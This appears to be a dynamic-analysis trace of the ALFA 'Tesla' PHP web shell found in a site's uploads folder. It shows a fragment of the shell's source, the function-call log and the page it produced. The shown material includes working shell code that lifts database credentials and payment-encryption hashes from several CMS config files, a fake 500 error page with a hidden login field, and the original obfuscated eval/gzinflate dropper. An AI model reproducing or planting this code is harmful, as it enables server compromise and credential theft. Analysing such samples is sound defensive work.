_name(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/db_username(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/db_password(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'cc_encryption_hash\'=>array("/cc_encryption_hash(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'joomla\'=>array(\'file\'=>\'/configuration.php\',\r\n\'host\'=>array("/\\\\\\$host(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/\\\\\\$db(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/\\\\\\$user(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/\\\\\\$password(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/\\\\\\$dbprefix(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'phpbb\'=>array(\'file\'=>\'/config.php\',\r\n\'host\'=>array("/dbhost(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/dbname(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/dbuser(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/dbpasswd(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/table_prefix(\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n),\r\n\'mybb\'=>array(\'file\'=>\'/inc/config.php\',\r\n\'host\'=>array("/config\\[\'database\'\\]\\[\'hostname\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbname\'=>array("/config\\[\'database\'\\]\\[\'database\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbuser\'=>array("/config\\[\'database\'\\]\\[\'username\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'dbpw\'=>array("/config\\[\'database\'\\]\\[\'password\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3),\r\n\'prefix\'=>array("/config\\[\'database\'\\]\\[\'table_prefix\'\\](\\s+)=(\\s+)(?:\'|\\")(.*?)(?:\'|\\");/",3)\r\n)\r\n);\r\nif($cms == "drupal"){\r\n\t$file = $config[$cms][\'file\'];\r\n\t$file=$path.$file;\r\n\tif(@is_file($file)||_alfa_is_dir($file,"-e")){\r\n\t}else{\r\n\t\t$cms = \'drupal2\';\r\n\t}\r\n}\r\nif($cms == "vb"){\r\n\t$file = $config[$cms][\'file\'];\r\n\t$file=$path.$file;\r\n\tif(@is_file($file)||_alfa_is_dir($file,"-e")){\r\n\t}else{\r\n\t\t$path .= \'/core\';\r\n\t}\r\n}\r\n$data = array();\r\n$srch_host = $config[$cms][\'host\'][0];\r\n$srch_user = $config[$cms][\'dbuser\'][0];\r\n$srch_name = $config[$cms][\'dbname\'][0];\r\n$srch_pw = $config[$cms][\'dbpw\'][0];\r\n$prefix = $config[$cms][\'prefix\'][0];\r\n$file = $config[$cms][\'file\'];\r\n$chost = $config[$cms][\'host\'][1];\r\n$cuser = $config[$cms][\'dbuser\'][1];\r\n$cname = $config[$cms][\'dbname\'][1];\r\n$cpw = $config[$cms][\'dbpw\'][1];\r\n$cprefix = $config[$cms][\'prefix\'][1];\r\nif(@is_dir($path)||_alfa_is_dir($path)){\r\n$file=$path.$file;\r\n}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){\r\n$file=$path;\r\n}else{\r\nreturn false;\r\n}\r\n$file = __read_file($file);\r\nif($cms == "drupal2"){\r\n\t$file = preg_replace("/\\@code(.*?)\\@endcode/s", "", $file);\r\n}elseif($cms == "vb"){\r\n\t$file = preg_replace("/right of the(.*?)BAD!/s", "", $file);\r\n}\r\nif(preg_match($srch_host, $file, $mach)){\r\n$data[\'host\'] = $mach[$chost];\r\n}\r\nif(preg_match($srch_user, $file, $mach)){\r\n$data[\'user\'] = $mach[$cuser];\r\n}\r\nif(preg_match($srch_name, $file, $mach)){\r\n$data[\'dbname\'] = $mach[$cname];\r\n}\r\nif(preg_match($srch_pw, $file, $mach)){\r\n$data[\'password\'] = $mach[$cpw];\r\n}\r\nif(isset($prefix)){\r\nif(preg_match($prefix, $file, $mach)){\r\n$data[\'prefix\'] = $mach[$cprefix];\r\n}\r\n}\r\nif($cms==\'whmcs\'){\r\nif(preg_match($config[$cms][\'cc_encryption_hash\'][0], $file, $mach)){\r\n$data[\'cc_encryption_hash\'] = $mach[3];\r\n}\r\n}\r\necho json_encode($data);\r\n}\r\nif(empty($_POST[\'a\']))\r\nif(isset($default_action) && function_exists(\'alfa\' . $default_action))\r\n$_POST[\'a\'] = $default_action;\r\nelse\r\n$_POST[\'a\'] = \'FilesMan2\';//\'FilesMan\';\r\nif(!empty($_POST[\'a\']) && function_exists(\'alfa\' . $_POST[\'a\']))\r\ncall_user_func(\'alfa\' . $_POST[\'a\']);\r\nexit;\r\n/*\r\n#Persian Gulf For Ever\r\n#skype : sole.sad\r\n#skype : ehsan.invisible\r\n*/\r\n?>'	/var/www/html/uploads/tesla.php(10) : eval()'d code	1	0
4	17	0	0.058630	3419768	session_start	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	2	0
4	17	1	0.058715	3420520
4	17	R			TRUE
4	18	0	0.058733	3420520	error_reporting	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	3	1	0
4	18	1	0.058749	3420560
4	18	R			0
4	19	0	0.058763	3420520	set_time_limit	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	4	1	0
4	19	1	0.058781	3420584
4	19	R			FALSE
4	20	0	0.058795	3420552	clearstatcache	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	5	0
4	20	1	0.058809	3420552
4	20	R			NULL
4	21	0	0.058823	3420552	ini_set	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	6	2	'error_log'	NULL
4	21	1	0.058839	3420624
4	21	R			''
4	22	0	0.058852	3420552	ini_set	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	7	2	'log_errors'	0
4	22	1	0.058867	3420624
4	22	R			'1'
4	23	0	0.058880	3420552	ini_set	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	8	2	'max_execution_time'	0
4	23	1	0.058894	3420592
4	23	R			'0'
4	24	0	0.058911	3420520	ini_set	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	9	2	'output_buffering'	0
4	24	1	0.058926	3420592
4	24	R			FALSE
4	25	0	0.058939	3420520	ini_set	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	10	2	'display_errors'	0
4	25	1	0.058954	3420592
4	25	R			''
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	18	GLOBALS['oZgNypoPRU'] = ['username' => 'admin', 'password' => '8d44ef8a56b85e7a0894c99fc50f55e2', 'safe_mode' => '1', 'login_page' => '500', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	28	$CWppUDJxuf = 'function_exists'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	29	$aztJtafUXm = 'charCodeAt'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	30	$OVpGNqqFZs = 'eval'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	31	$psDEwGhsxg = 'gzinflate'
4	26	0	0.059044	3420520	function_exists	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	33	1	'base64_encode'
4	26	1	0.059059	3420560
4	26	R			TRUE
4	27	0	0.059073	3420520	function_exists	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	81	1	'base64_decode'
4	27	1	0.059088	3420560
4	27	R			TRUE
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	135	GLOBALS['DB_NAME'] = ['username' => 'admin', 'password' => '8d44ef8a56b85e7a0894c99fc50f55e2', 'safe_mode' => '1', 'login_page' => '500', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	137	$key = 'username'
4	28	0	0.059137	3420496	substr	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	3	'username'	0	2
4	28	1	0.059153	3420624
4	28	R			'us'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	$prefix = 'us'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	142	GLOBALS['DB_NAME']['user'] = 'admin'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	143	GLOBALS['DB_NAME']['user_rand'] = 'username'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	137	$key = 'password'
4	29	0	0.059218	3421224	substr	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	3	'password'	0	2
4	29	1	0.059232	3421352
4	29	R			'pa'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	$prefix = 'pa'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	147	GLOBALS['DB_NAME']['pass'] = '8d44ef8a56b85e7a0894c99fc50f55e2'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	148	GLOBALS['DB_NAME']['pass_rand'] = 'password'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	137	$key = 'safe_mode'
4	30	0	0.059297	3421224	substr	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	3	'safe_mode'	0	2
4	30	1	0.059312	3421352
4	30	R			'sa'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	$prefix = 'sa'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	152	GLOBALS['DB_NAME']['safemode'] = '1'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	153	GLOBALS['DB_NAME']['safemode_rand'] = 'safe_mode'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	137	$key = 'login_page'
4	31	0	0.059374	3421224	substr	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	3	'login_page'	0	2
4	31	1	0.059389	3421352
4	31	R			'lo'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	$prefix = 'lo'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	157	GLOBALS['DB_NAME']['login_page'] = '500'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	158	GLOBALS['DB_NAME']['login_page_rand'] = 'login_page'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	137	$key = 'show_icons'
4	32	0	0.059451	3421224	substr	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	3	'show_icons'	0	2
4	32	1	0.059465	3421352
4	32	R			'sh'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	$prefix = 'sh'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	162	GLOBALS['DB_NAME']['show_icons'] = '1'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	163	GLOBALS['DB_NAME']['show_icons_rand'] = 'show_icons'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	137	$key = 'post_encryption'
4	33	0	0.059531	3421224	substr	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	3	'post_encryption'	0	2
4	33	1	0.059546	3421352
4	33	R			'po'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	$prefix = 'po'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	167	GLOBALS['DB_NAME']['post_encryption'] = FALSE
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	168	GLOBALS['DB_NAME']['post_encryption_rand'] = 'post_encryption'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	137	$key = 'cgi_api'
4	34	0	0.059607	3421224	substr	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	3	'cgi_api'	0	2
4	34	1	0.059622	3421352
4	34	R			'cg'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	139	$prefix = 'cg'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	172	GLOBALS['DB_NAME']['cgi_api'] = TRUE
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	173	GLOBALS['DB_NAME']['cgi_api_rand'] = 'cgi_api'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	181	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
4	35	0	0.059697	3421864	implode	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	181	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
4	35	1	0.059718	3422024
4	35	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider'
4	36	0	0.059737	3421960	preg_match	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	181	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i'	'python-requests/2.25.1'
4	36	1	0.059757	3422024
4	36	R			0
4	37	0	0.059772	3421864	define	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	188	2	'__ALFA_VERSION__'	'4.1'
4	37	1	0.059788	3421968
4	37	R			TRUE
4	38	0	0.059801	3421896	define	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	189	2	'__ALFA_UPDATE__'	'2'
4	38	1	0.059815	3422000
4	38	R			TRUE
4	39	0	0.059828	3421928	define	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	190	2	'__ALFA_CODE_NAME__'	'Tesla'
4	39	1	0.059843	3422032
4	39	R			TRUE
4	40	0	0.059856	3421960	define	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	191	2	'__ALFA_DATA_FOLDER__'	'ALFA_DATA'
4	40	1	0.059870	3422064
4	40	R			TRUE
4	41	0	0.059884	3421992	define	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	192	2	'__ALFA_POST_ENCRYPTION__'	FALSE
4	41	1	0.059899	3422096
4	41	R			TRUE
4	42	0	0.059913	3422024	define	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	193	2	'__ALFA_SECRET_KEY__'	''
4	42	1	0.059928	3422128
4	42	R			TRUE
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	194	GLOBALS['__ALFA_COLOR__'] = ['shell_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'header_vars' => '#27979B', 'header_values' => '#67ABDF', 'header_on' => '#00FF00', 'header_off' => '#ff0000', 'header_none' => '#00FF00', 'home_shell' => '#ff0000', 'home_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'back_shell' => '#efbe73', 'back_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_pwd' => '#00FF00', 'header_pwd:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_drive' => '#00FF00', 'header_drive:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_show_all' => '#00FF00', 'disable_functions' => '#ff0000', 'footer_text' => '#27979B', 'menu_options' => '#27979B', 'menu_options:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'options_list' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'options_list:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'options_list_header' => ['key_color' => '#59cc33', 'multi_selector' => [...]], 'options_list_text' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'Alfa+' => ['key_color' => '#06ff0f', 'multi_selector' => [...]], 'hidden_shell_text' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'hidden_shell_version' => '#ff0000', 'shell_name' => '#FF0000', 'main_row:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'main_header' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_name' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_size' => '#67ABDF', 'main_modify' => '#67ABDF', 'main_owner_group' => '#67ABDF', 'main_green_perm' => '#25ff00', 'main_red_perm' => '#FF0000', 'main_white_perm' => '#FFFFFF', 'beetween_perms' => '#FFFFFF', 'main_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'minimize_editor_background' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'minimize_editor_text' => ['key_color' => '#f5deb3', 'multi_selector' => [...]], 'editor_border' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'editor_background' => ['key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => [...]], 'editor_header_background' => ['key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => [...]], 'editor_header_text' => ['key_color' => '#00ff7f', 'multi_selector' => [...]], 'editor_header_button' => ['key_color' => '#1d5673', 'multi_selector' => [...]], 'editor_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_vars' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_values' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'editor_history_header' => ['key_color' => '#14ff07', 'multi_selector' => [...]], 'editor_history_list' => ['key_color' => '#03b3a3', 'multi_selector' => [...]], 'editor_history_selected_file' => ['key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => [...]], 'editor_history_file:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'input_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'input_box_text' => ['key_color' => '#999999', 'multi_selector' => [...]], 'input_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'select_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'select_box_text' => ['key_color' => '#FFFFEE', 'multi_selector' => [...]], 'select_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button_border' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'outputs_text' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'outputs_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_background' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_text_right' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'uploader_text_left' => ['key_color' => '#25ff00', 'multi_selector' => [...]], 'uploader:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'uploader_progress_bar' => ['key_color' => '#00ff00', 'multi_selector' => [...]], 'mysql_tables' => '#00FF00', 'mysql_table_count' => '#67ABDF', 'copyright' => '#dfff00', 'scrollbar' => ['key_color' => '#1e82b5', 'multi_selector' => [...]], 'scrollbar_background' => ['key_color' => '#000115', 'multi_selector' => [...]]]
4	43	0	0.060061	3422056	preg_replace	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	520	3	'!\\(\\d+\\)\\s.*!'	''	'/var/www/html/uploads/tesla.php(10) : eval()\'d code(1) : eval()\'d code'
4	43	1	0.060083	3422248
4	43	R			'/var/www/html/uploads/tesla.php'
4	44	0	0.060098	3422152	trim	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	520	1	'/var/www/html/uploads/tesla.php'
4	44	1	0.060112	3422184
4	44	R			'/var/www/html/uploads/tesla.php'
4	45	0	0.060127	3422152	str_replace	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	520	3	'\\'	'/'	'/var/www/html/uploads/tesla.php'
4	45	1	0.060143	3422248
4	45	R			'/var/www/html/uploads/tesla.php'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	520	GLOBALS['__file_path'] = '/var/www/html/uploads/tesla.php'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	521	$config = ['AlfaUser' => 'admin', 'AlfaPass' => '8d44ef8a56b85e7a0894c99fc50f55e2', 'AlfaProtectShell' => '1', 'AlfaLoginPage' => '500']
4	46	0	0.060192	3422528	session_write_close	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	523	0
4	46	1	0.060210	3422424
4	46	R			TRUE
4	47	0	0.060224	3422424	ignore_user_abort	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	524	1	TRUE
4	47	1	0.060238	3422488
4	47	R			0
4	48	0	0.060251	3422456	set_time_limit	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	525	1	0
4	48	1	0.060265	3422520
4	48	R			FALSE
4	49	0	0.060277	3422488	ini_set	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	526	2	'memory_limit'	'-1'
4	49	1	0.060292	3422592
4	49	R			'128M'
4	50	0	0.060306	3422488	ini_set	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	527	2	'upload_max_filesize'	'9999m'
4	50	1	0.060321	3422560
4	50	R			FALSE
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	529	$SERVER_SIG = '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n'
3		A						/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	530	$Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>'
4	51	0	0.060371	3422488	md5	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	561	1	'8d44ef8a56b85e7a0894c99fc50f55e2'
4	51	1	0.060386	3422584
4	51	R			'76be4af96a0a5188e44afe0b355cc0f6'
4	52	0	0.060402	3422488	md5	0		/var/www/html/uploads/tesla.php(10) : eval()'d code(1) : eval()'d code	562	1	NULL
4	52	1	0.060415	3422584
4	52	R			'd41d8cd98f00b204e9800998ecf8427e'
			0.060462	3277688
TRACE END   [2023-02-13 00:24:22.810086]


Generated HTML code

<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, webmaster@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>
<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form></body></html>

Original PHP code

<?php
error_reporting(0);
$MEMEK_CYBER = "\x75\x72\154" . "\144\x65\143" . "\157\144\x65";
$JEMBUT_CYBER = "\x62\141\163" . "\x65\66\x34\137" . "\144\145\x63" . "\157\x64\145";
$LONTE_CYBER = "\150\x74\x6d\x6c" . "\x73\x70\145\143" . "\x69\141\154" . "\x63\x68\x61\x72\163" . "\x5f\144\145\x63" . "\x6f\144\145";
$MEMEK_CYNA = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1
bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2Rl
Y29kZSUyOHN0cnJldiUyOCUyNE1FTUVLJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC";
$MEMEK = "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